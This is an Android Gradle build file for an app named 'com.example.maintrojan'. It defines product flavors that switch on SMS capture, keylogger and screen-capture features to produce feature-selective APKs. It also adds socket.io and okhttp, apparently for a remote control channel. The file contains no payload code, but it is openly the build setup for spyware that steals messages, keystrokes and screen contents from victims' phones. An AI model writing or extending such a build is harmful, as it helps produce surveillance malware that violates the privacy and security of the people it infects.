plugins {
    id 'com.android.application'
}

android {
    compileSdk 34


    defaultConfig {
        applicationId "com.example.maintrojan"
        minSdk 21
        targetSdk 28
        versionCode 1
        versionName "1.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
    }
    
    buildFeatures {
        buildConfig = true
    }

    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }
    
    lintOptions {
        abortOnError false
        checkReleaseBuilds false
    }
    
    compileOptions {
        sourceCompatibility JavaVersion.VERSION_17
        targetCompatibility JavaVersion.VERSION_17
    }
    namespace 'com.example.maintrojan'
    
    // Product Flavors for Feature-Selective APKs
    flavorDimensions "features"
    
    productFlavors {
        sms {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "true"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "false"
            buildConfigField "boolean", "FEATURE_SCREEN", "false"
            versionNameSuffix "-sms"
        }
        
        keylogger {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "false"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "true"
            buildConfigField "boolean", "FEATURE_SCREEN", "false"
            versionNameSuffix "-keylogger"
        }
        
        screen {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "false"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "false"
            buildConfigField "boolean", "FEATURE_SCREEN", "true"
            versionNameSuffix "-screen"
        }
        
        smsKeylogger {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "true"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "true"
            buildConfigField "boolean", "FEATURE_SCREEN", "false"
            versionNameSuffix "-sms-keylogger"
        }
        
        smsScreen {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "true"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "false"
            buildConfigField "boolean", "FEATURE_SCREEN", "true"
            versionNameSuffix "-sms-screen"
        }
        
        keyloggerScreen {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "false"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "true"
            buildConfigField "boolean", "FEATURE_SCREEN", "true"
            versionNameSuffix "-keylogger-screen"
        }
        
        full {
            dimension "features"
            buildConfigField "boolean", "FEATURE_SMS", "true"
            buildConfigField "boolean", "FEATURE_KEYLOGGER", "true"
            buildConfigField "boolean", "FEATURE_SCREEN", "true"
            versionNameSuffix "-full"
        }
    }
}

dependencies {

    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.11.0'
    implementation 'androidx.constraintlayout:constraintlayout:2.1.4'
    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.1.3'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.4.0'
    implementation ('io.socket:socket.io-client:2.0.0') {
        exclude group: 'org.json', module: 'json'
    }
    implementation("com.squareup.okhttp3:okhttp:4.10.0")

}